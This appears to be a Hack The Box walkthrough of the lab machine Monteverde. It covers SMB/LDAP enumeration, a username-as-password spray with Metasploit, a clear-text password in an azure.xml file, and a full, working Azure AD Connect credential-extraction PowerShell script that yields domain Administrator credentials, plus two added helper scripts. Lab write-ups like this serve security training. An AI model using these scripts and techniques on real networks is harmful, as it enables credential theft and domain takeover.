Monteverde was the second new box of 2020: a Medium Windows machine worth 30 points towards your next Hack The Box rank. Personally I like the Windows machines better than the Linux ones, purely because my day job is in the Microsoft ecosystem. Enough general chatter, time to discover Monteverde.


An Nmap scan a day keeps the doctor away. First let's see what this Windows box exposes. DNS, Kerberos, LDAP (plain and Global Catalog) and SMB are open, so this is a domain controller, and a large part of the enumeration can be done over LDAP and SMB. WinRM does not appear in this top-1000 port scan, but it is reachable on the box (evil-winrm is used further down). Two details in the output are worth noting now: SMB signing is enabled and required, so NTLM relay against this host is not an option, and the clock skew of roughly nine minutes would break Kerberos authentication (five-minute tolerance by default) should you switch from NTLM to Kerberos later on.
nmap -sC -sV -T5 -oA monteverde 10.10.10.172
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 10:55 GMT
Nmap scan report for 10.10.10.172
Host is up (0.061s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-09 11:05:45Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/9%Time=5E3FE556%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 9m27s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-02-09T11:08:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.68 seconds
With enum4linux over a null session (empty username and password) you quickly see the domain name and SID, which accounts exist and which groups they belong to.
enum4linux 10.10.10.172
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 9 10:56:14 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===========================================
|    Getting domain SID for 10.10.10.172    |
 ===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)

 =============================
|    Users on 10.10.10.172    |
 =============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2  Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos          Name: Dimitris Galanos  Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest             Name: (null)            Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope             Name: Mike Hope         Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary           Name: Ray O'Leary       Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs       Name: SABatchJobs       Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan           Name: Sally Morgan      Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata           Name: svc-ata           Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec         Name: svc-bexec         Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp        Name: svc-netapp        Desc: (null)

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]

[+] Getting domain group memberships:
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
The output gives a list of usernames but nothing that points at a password. The one real hint is the description of AAD_987d7f2f57d2: a service account for the Synchronization Service, which tells you Azure AD Connect is installed on this host, something to remember for later. I put the usernames in a text file to check quickly with Metasploit's smb_login module whether any of these accounts can be logged in to.
msfconsole
       =[ metasploit v5.0.72-dev                          ]
+ -- --=[ 1963 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use auxiliary/scanner/smb/smb_login
First, I try the USER_AS_PASS option: the module then tries each username in my user list as its own password. It is a cheap check for a lazy administrator, and with a single attempt per account it stays well clear of any lockout threshold.
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.172
RHOSTS => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK
SMBDomain => MEGABANK
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /home/user/Documents/boxes/monteverde/userlist.txt
USER_FILE => /home/user/Documents/boxes/monteverde/userlist.txt
msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > run
Failed, Failed, Failed, Success! It looks like the password of SABatchJobs is simply: SABatchJobs.
[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\dgalanos:dgalanos',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\Guest:Guest',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\mhope:mhope',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\roleary:roleary',
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[0x3] Path to User flag
SABatchJobs cannot log in over Windows Remote Management, so the first step is to browse the SMB shares with the password just found.
smbclient -U SABatchJobs -L 10.10.10.172
Enter WORKGROUP\SABatchJobs's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        azure_uploads   Disk
        C$              Disk      Default share
        E$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
        users$          Disk
The users$ share holds a home directory per user. With these credentials all of them list as empty except mhope's, which contains a single file: azure.xml.
smbclient \\\\monteverde\\users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Fri Jan  3 13:12:48 2020
  ..                                  D        0  Fri Jan  3 13:12:48 2020
  dgalanos                            D        0  Fri Jan  3 13:12:30 2020
  mhope                               D        0  Fri Jan  3 13:41:18 2020
  roleary                             D        0  Fri Jan  3 13:10:30 2020
  smorgan                             D        0  Fri Jan  3 13:10:24 2020

\dgalanos
  .                                   D        0  Fri Jan  3 13:12:30 2020
  ..                                  D        0  Fri Jan  3 13:12:30 2020

\mhope
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

\roleary
  .                                   D        0  Fri Jan  3 13:10:30 2020
  ..                                  D        0  Fri Jan  3 13:10:30 2020

\smorgan
  .                                   D        0  Fri Jan  3 13:10:24 2020
  ..                                  D        0  Fri Jan  3 13:10:24 2020

                524031 blocks of size 4096. 518419 blocks available
This is not a hand-written config file but a PowerShell object serialized with Export-Clixml: a Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential, the type the AzureRM/Az PowerShell modules use for Azure AD application password credentials. Nothing in it is needed as code; what matters is that the Password property is stored in clear text. Since the file sits in mhope's home directory, there is a fair chance he reused this as his domain password.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
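Files like azure.xml are easy to miss in a larger loot dump, because a CliXML export looks like any other XML. The helper below is an added example, not part of the original write-up: it walks a directory of files pulled from a share, recognises CliXML exports by their serialization namespace, rehydrates them with Import-Clixml (no Azure module needed, the objects come back as plain Deserialized.* PSCustomObjects) and reports every property whose name looks like a secret, together with the object type and its EndDate where present. The loot directory, the property-name pattern and the embedded sample file (a copy of the azure.xml above, written to a temp folder) are constructed for the example.

```powershell
# Find-ClixmlSecrets.ps1 -- added example, not from the write-up or from Microsoft.
# Triage files pulled from a share for PowerShell CliXML exports (Export-Clixml output)
# and list properties that look like secrets. The loot path and the pattern are assumptions.

function Find-ClixmlSecrets {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Property names worth reporting; deliberately loose, over-reporting is cheap here.
        [string] $SecretPattern = 'pass|pwd|secret|key|token|credential'
    )

    $clixmlNs = 'http://schemas.microsoft.com/powershell/2004/04'

    Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        # Cheap pre-check: only CliXML files carry the PowerShell serialization namespace.
        try { $head = Get-Content -LiteralPath $file.FullName -TotalCount 3 -ErrorAction Stop }
        catch { return }
        if (-not ($head -match [regex]::Escape($clixmlNs))) { return }

        # Import-Clixml rehydrates the objects as Deserialized.<TypeName> PSCustomObjects.
        try { $objects = Import-Clixml -LiteralPath $file.FullName -ErrorAction Stop }
        catch { Write-Warning "$($file.FullName): $_"; return }

        foreach ($obj in @($objects)) {
            $typeName = $obj.PSObject.TypeNames | Select-Object -First 1
            $expires  = $obj.PSObject.Properties['EndDate']
            foreach ($prop in $obj.PSObject.Properties) {
                if ($prop.Name -notmatch $SecretPattern) { continue }
                # Exported PSCredential/SecureString values stay DPAPI-bound to the exporting
                # user and machine; flag them instead of printing useless ciphertext.
                $value = if ($prop.Value -is [System.Security.SecureString]) { '<SecureString, DPAPI-bound>' }
                         else { [string]$prop.Value }
                [pscustomobject]@{
                    File     = $file.FullName
                    Type     = $typeName
                    Property = $prop.Name
                    Value    = $value
                    Expires  = if ($expires) { $expires.Value } else { $null }
                }
            }
        }
    }
}

# Constructed sample input: the azure.xml from the write-up, dropped into a temp loot directory.
$loot = Join-Path ([System.IO.Path]::GetTempPath()) 'monteverde-loot'
New-Item -ItemType Directory -Path (Join-Path $loot 'mhope') -Force | Out-Null
@'
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
'@ | Set-Content -LiteralPath (Join-Path $loot 'mhope\azure.xml')

Find-ClixmlSecrets -Path $loot | Format-Table -AutoSize
```

For the sample file this lists the Password property with its clear-text value (and KeyId, which the loose pattern also catches), tagged with the Deserialized.Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential type and the 2054 EndDate. Strings stored with an `<S>` element, as here, are readable by anyone who can read the file; only SecureString or PSCredential exports are protected, and then only for the user and machine that created them.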
After SABatchJobs I now have a second set of credentials, this time for mhope, and I expect them to give me the user flag.
evil-winrm -i monteverde -u "megabank\mhope" -p "4n0therD4y@n0th3r$"

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents>
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir

    Directory: C:\Users\mhope\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 user.txt
User flag is in. Now continue to search for an option to find root.
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
[0x4] Path to Root flag
The machine is fairly bare and there is little of interest to browse through. In C:\Program Files you can see that this box runs Azure AD Connect, the tooling that synchronizes an on-premises Active Directory to Azure Active Directory, which also matches the AAD_ service account and the Azure Admins group (mhope is a member) from the enumeration earlier. I do not expect this on an HTB box without it having a purpose. Will this be root?
*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:31 PM                Microsoft SQL Server
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0
After some searching on Google I find Adam Chester's (XPN) article "Azure AD Connect for Red Teamers". It explains how a PowerShell script can read the ADSync database and, using AD Connect's own crypto assembly, decrypt the username and password of the account the synchronization service uses against on-premises AD. The script is on the website; however, it does not work directly on this box.
After some errors about not being able to connect, I made an adjustment to the script. The folder C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER explains why: MSSQL14 is SQL Server 2017 and MSSQLSERVER is the default instance, so on Monteverde the ADSync database lives on a full SQL Server instance. The original script instead connects to the SQL Server LocalDB instance that an express-style Azure AD Connect installation uses. This is the original line:

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

Below is the working script for dumping the Azure AD Sync credentials. Only the $client line differs from the original on XPN InfoSec's blog: it now points at the local SQL Server instance.
# Azure-ADConnect-CredentialExtract.ps1
# Original author: Adam Chester (XPN), "Azure AD Connect for Red Teamers"
# Change: the $client connection string points at the full SQL Server instance that hosts
# ADSync on Monteverde instead of the LocalDB instance the original targets.

$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Initial Catalog=ADSync;Trusted_Connection=yes;"
$client.Open()

# Identifiers of the key set that protects the connector credentials
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# Clear-text connector configuration (domain and user) plus the encrypted blob (password)
# for the on-premises AD connector
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

# Let AD Connect's own crypto assembly load the key set and decrypt the blob
Add-Type -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Domain and user come from the configuration XML, the password from the decrypted XML
$domain = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | Select-Object @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-user']" | Select-Object @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = Select-Xml -Content $decrypted -XPath "//attribute" | Select-Object @{Name = 'Password'; Expression = {$_.node.InnerXML}}

Write-Host ("[+] Domain: " + $domain.Domain)
Write-Host ("[+] Username: " + $username.Username)
Write-Host ("[+] Password: " + $password.Password)
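Hard-coding either "(localdb)\.\ADSync" or "localhost" means the script breaks on the next box where the database lives somewhere else. The helper below is an added example, not part of the write-up or of XPN's script: it builds the connection string from what the ADSync service itself recorded at install time and then runs the two queries the extraction depends on, which is exactly the step that failed here, before any decryption is attempted. It assumes the service stores its SQL location under HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters in the values Server, SQLInstance and DBName (check with Get-ItemProperty on the target if the lookup comes back empty); the LocalDB detection rule and the function names are mine. It has to run on the AD Connect host, as a user who is allowed to read the ADSync database (on Monteverde, mhope is).

```powershell
# Get-ADSyncConnectionString.ps1 -- added example, not from the write-up or from XPN's script.
# Derive the ADSync connection string from the service's registry parameters (assumed to be
# Server, SQLInstance, DBName under the ADSync service key) and verify the tables the
# credential extraction reads are reachable before touching mcrypt.dll.

function Get-ADSyncConnectionString {
    $regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters'
    $params  = Get-ItemProperty -Path $regPath -ErrorAction SilentlyContinue
    if (-not $params) { throw "No ADSync parameters at $regPath; is Azure AD Connect installed here?" }

    $db = if ($params.DBName) { $params.DBName } else { 'ADSync' }

    # Express install: SQL Server LocalDB, a shared instance named ADSync that only the
    # ADSync service account can normally open. Assumption: Server is empty or "(localdb)".
    if ([string]::IsNullOrEmpty($params.Server) -or $params.Server -like '(localdb)*') {
        return "Data Source=(localdb)\.\ADSync;Initial Catalog=$db;Integrated Security=True"
    }

    # Full SQL Server, as on Monteverde (MSSQL14.MSSQLSERVER = SQL Server 2017, default instance).
    $source = if ($params.SQLInstance) { "$($params.Server)\$($params.SQLInstance)" } else { $params.Server }
    return "Data Source=$source;Initial Catalog=$db;Integrated Security=True"
}

function Test-ADSyncDatabase {
    param([Parameter(Mandatory)] [string] $ConnectionString)

    $conn = New-Object System.Data.SqlClient.SqlConnection -ArgumentList $ConnectionString
    try {
        $conn.Open()
        $cmd = $conn.CreateCommand()

        # Key set identifiers: the extraction cannot decrypt anything without these.
        $cmd.CommandText = 'SELECT keyset_id, instance_id, entropy FROM mms_server_configuration'
        $r = $cmd.ExecuteReader()
        if (-not $r.Read()) { throw 'mms_server_configuration is empty' }
        $keyset = [pscustomobject]@{ KeySetId = $r.GetInt32(0); InstanceId = $r.GetGuid(1); Entropy = $r.GetGuid(2) }
        $r.Close()

        # One row per connector. ma_type 'AD' is the on-premises forest whose credentials the
        # write-up recovers; listing all of them shows what else this server can reach.
        $cmd.CommandText = 'SELECT ma_id, ma_name, ma_type FROM mms_management_agent'
        $r = $cmd.ExecuteReader()
        $agents = while ($r.Read()) {
            [pscustomobject]@{ Id = $r.GetValue(0); Name = $r.GetValue(1); Type = $r.GetValue(2) }
        }
        $r.Close()

        [pscustomobject]@{ KeySet = $keyset; Connectors = @($agents) }
    }
    finally { $conn.Dispose() }
}

$cs = Get-ADSyncConnectionString
Write-Host "[*] Connection string: $cs"
$state = Test-ADSyncDatabase -ConnectionString $cs
Write-Host "[*] Key set $($state.KeySet.KeySetId), instance $($state.KeySet.InstanceId)"
$state.Connectors | Format-Table -AutoSize
```

Once this succeeds, drop $cs into the $client line of the extraction script and the rest runs unchanged. If the connection string resolves to LocalDB and the open fails with an access error, the database is only reachable as the ADSync service account, which is a different privilege-escalation problem than the one on this box.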
I modified and saved the script locally on my laptop. With Evil-WinRM's built-in upload command you can easily push it to the remote box.
*Evil-WinRM* PS C:\users\mhope\Videos> upload Azure-ADConnect-CredentialExtract.ps1
Info: Uploading Azure-ADConnect-CredentialExtract.ps1 to C:\users\mhope\Videos\ad2.ps1

Data: 2288 bytes of 2288 bytes copied

Info: Upload successful!
And there you have it: on this box the account Azure AD Sync uses against on-premises AD is the domain Administrator itself. That is the real misconfiguration here. A default Azure AD Connect installation creates a dedicated MSOL_ account with only the directory permissions the sync needs, and whoever can read the ADSync database inherits the privileges of whatever account was configured; here that is Domain Admin.
*Evil-WinRM* PS C:\users\mhope\Videos> powershell ./Azure-ADConnect-CredentialExtract.ps1
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+] Password: d0m@in4dminyeah!
With the newly acquired Administrator credentials I can log in through Evil-WinRM.
evil-winrm -i monteverde -u "megabank\Administrator" -p "d0m@in4dminyeah!"

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
As the last step of this box, I take the root flag. With this, Monteverde is officially rooted!
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat c:\Users\Administrator\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc